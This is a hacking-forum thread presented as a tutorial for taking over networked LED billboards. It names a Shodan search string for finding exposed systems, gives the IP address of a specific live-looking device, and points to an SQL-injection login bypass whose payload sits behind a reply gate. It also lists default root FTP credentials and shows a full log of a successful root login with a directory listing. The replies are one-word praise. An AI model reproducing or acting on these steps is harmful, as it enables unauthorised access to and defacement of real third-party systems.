
[Tutorial] How to Hack Billboards

4 replies to this topic

#1
TimeCenter


Step 1. Register on Shodan
Step 2. Look up: title:"lednet live system"

You'll find some!

Example: 186.206.188.175:8060/en/main.html

How to hack it? Well, the username parameter is vulnerable to SQL injection.

So to login, paste

Hidden Content
You'll be able to see the hidden content once you reply to this topic.


in the username parameter and anything in the password input. Now click login!


Another vulnerability is a default password vuln. You can basically get root FTP access to all of these billboards.

Username: root
Password: 111111

$ ftp 186.206.188.175
Connected to 186.206.188.175.
220 Welcome to blah FTP service.
Name (186.206.188.175): root
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd /
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||41314|).
150 Here comes the directory listing.
drwxr-xr-x    1 0        0            1464 Jan 01  1970 bin
lrwxrwxrwx    1 0        0              21 Jan 01  1970 c: -> /usr/local/playdata/c
lrwxrwxrwx    1 0        0              21 Jan 01  1970 d: -> /usr/local/playdata/d
drwxr-xr-x    7 0        0               0 May 21 18:08 dev
lrwxrwxrwx    1 0        0              21 Jan 01  1970 e: -> /usr/local/playdata/e
drwxr-xr-x    1 0        0             748 Jan 01  1970 etc
lrwxrwxrwx    1 0        0              21 Jan 01  1970 f: -> /usr/local/playdata/f
drwxr-xr-x    1 0        0              36 Jan 01  1970 home
drwxr-xr-x    1 0        0            1868 Jan 01  1970 lib
lrwxrwxrwx    1 0        0              11 Jan 01  1970 linuxrc -> bin/busybox
drwxr-xr-x    1 0        0              32 Jan 01  1970 mnt
drwxr-xr-x    1 0        0               0 Jan 01  1970 opt
dr-xr-xr-x   51 0        0               0 Jan 01  1970 proc
drwxr-xr-x    1 0        0             116 Jan 01  1970 root
drwxr-xr-x    1 0        0            1332 Jan 01  1970 sbin
drwxr-xr-x   12 0        0               0 Jan 01  1970 sys
drwxrwxrwt    6 0        0             720 May 21 18:16 tmp
drwxr-xr-x    1 0        0             108 Jan 01  1970 usr
drwxr-xr-x    3 0        0             672 Jan 01  1970 var
drwxr-xr-x    4 0        0             288 Jan 01  1970 www
226 Directory send OK.
ftp>



 



#2
hydralolz


Nice :)



#3
NewbieAcount


nice



#4
alvisql


nice


nice tho!



#5
XR8ED


ty nice share




